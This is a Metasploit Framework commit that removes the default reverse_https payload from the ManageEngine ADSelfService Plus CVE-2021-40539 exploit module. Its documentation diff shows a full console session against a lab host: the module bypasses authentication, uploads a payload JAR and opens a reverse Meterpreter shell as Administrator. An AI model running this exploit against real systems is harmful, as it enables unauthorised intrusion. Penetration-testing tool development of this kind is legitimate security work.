Remove preferred payload

We'll add it back to Framework later.
rapid7 · Nov 24, 2021 · 344bdac · 344bdac
1 parent e8e5467
commit 344bdac
Show file tree

Hide file tree

Showing 2 changed files with 13 additions and 15 deletions.
diff --git a/.../modules/exploit/windows/http/manageengine_adselfservice_plus_cve_2021_40539.md b/.../modules/exploit/windows/http/manageengine_adselfservice_plus_cve_2021_40539.md
@@ -28,7 +28,7 @@ Path traversal for auth bypass. `/./` is the default.
 
 ```
 msf6 > use exploit/windows/http/manageengine_adselfservice_plus_cve_2021_40539
-[*] Using configured payload java/meterpreter/reverse_https
+[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
 msf6 exploit(windows/http/manageengine_adselfservice_plus_cve_2021_40539) > options
 
 Module options (exploit/windows/http/manageengine_adselfservice_plus_cve_2021_40539):
@@ -46,13 +46,12 @@ Module options (exploit/windows/http/manageengine_adselfservice_plus_cve_2021_40
    VHOST                       no        HTTP server virtual host
 
 
-Payload options (java/meterpreter/reverse_https):
+Payload options (java/meterpreter/reverse_tcp):
 
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
-   LHOST                   yes       The local listener hostname
-   LPORT  8443             yes       The local listener port
-   LURI                    no        The HTTP Path
+   LHOST  [redacted]       yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
 
 
 Exploit target:
@@ -62,27 +61,27 @@ Exploit target:
    0   Java Dropper
 
 
-msf6 exploit(windows/http/manageengine_adselfservice_plus_cve_2021_40539) > set rhosts 172.16.57.10
-rhosts => 172.16.57.10
+msf6 exploit(windows/http/manageengine_adselfservice_plus_cve_2021_40539) > set rhosts 172.16.57.167
+rhosts => 172.16.57.167
 msf6 exploit(windows/http/manageengine_adselfservice_plus_cve_2021_40539) > set lhost 172.16.57.1
 lhost => 172.16.57.1
 msf6 exploit(windows/http/manageengine_adselfservice_plus_cve_2021_40539) > run
 
-[*] Started HTTPS reverse handler on https://172.16.57.1:8443
+[*] Started reverse TCP handler on 172.16.57.1:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
 [+] The target is vulnerable. Successfully bypassed REST API authentication.
-[*] Uploading payload JAR: P2dP5Ric88T.jar
+[*] Uploading payload JAR: RlBtKpwLfU.jar
 [+] Successfully uploaded payload JAR
 [*] Executing payload JAR
-[*] https://172.16.57.1:8443 handling request from 172.16.57.10; (UUID: tyuzturs) Staging java payload (58615 bytes) ...
+[*] Sending stage (58082 bytes) to 172.16.57.167
 [+] Successfully executed payload JAR
-[+] Deleted P2dP5Ric88T.jar
-[*] Meterpreter session 1 opened (172.16.57.1:8443 -> 127.0.0.1 ) at 2021-11-15 18:08:25 -0600
+[+] Deleted RlBtKpwLfU.jar
+[*] Meterpreter session 1 opened (172.16.57.1:4444 -> 172.16.57.167:64699 ) at 2021-11-24 10:41:43 -0600
 
 meterpreter > getuid
 Server username: Administrator
 meterpreter > sysinfo
-Computer    : WIN-9MFFR3JM534
+Computer    : WIN-PRMQDT3BCJI
 OS          : Windows Server 2016 10.0 (amd64)
 Meterpreter : java/windows
 meterpreter >

diff --git a/modules/exploits/windows/http/manageengine_adselfservice_plus_cve_2021_40539.rb b/modules/exploits/windows/http/manageengine_adselfservice_plus_cve_2021_40539.rb
@@ -47,8 +47,7 @@ def initialize(info = {})
         ],
         'DefaultTarget' => 0,
         'DefaultOptions' => {
-          'RPORT' => 8888,
-          'PAYLOAD' => 'java/meterpreter/reverse_https'
+          'RPORT' => 8888
         },
         'Notes' => {
           'Stability' => [CRASH_SAFE],